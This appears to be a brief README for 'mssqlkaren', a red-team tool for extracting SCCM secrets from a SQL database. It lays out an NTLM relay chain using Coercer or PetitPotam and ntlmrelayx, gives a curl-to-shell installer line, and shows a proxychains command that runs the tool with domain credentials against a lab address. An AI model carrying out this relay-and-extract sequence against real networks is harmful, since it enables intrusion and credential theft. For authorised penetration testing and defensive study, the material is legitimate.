# mssqlkaren

Awesome tool for stealing SCCM goodies from SQL databases.

curl -LsSf https://astral.sh/uv/install.sh | sh

In a SCCM environment where you have multiple SCCM servers and one has SQL on it, relay one of the SCCM servers without SQL (using Coercer or petitpotam) to a SCCM server with SQL running on it (using something like ntlmrelayx -t mssql://sccmsql -socks -smb2support).

Once the relay is established, use mssqlkaren.py to extract SCCM secrets against your established session:

proxychains uv run mssqlkaren.py ludus/domainadmin:password@10.6.10.13 -windows-auth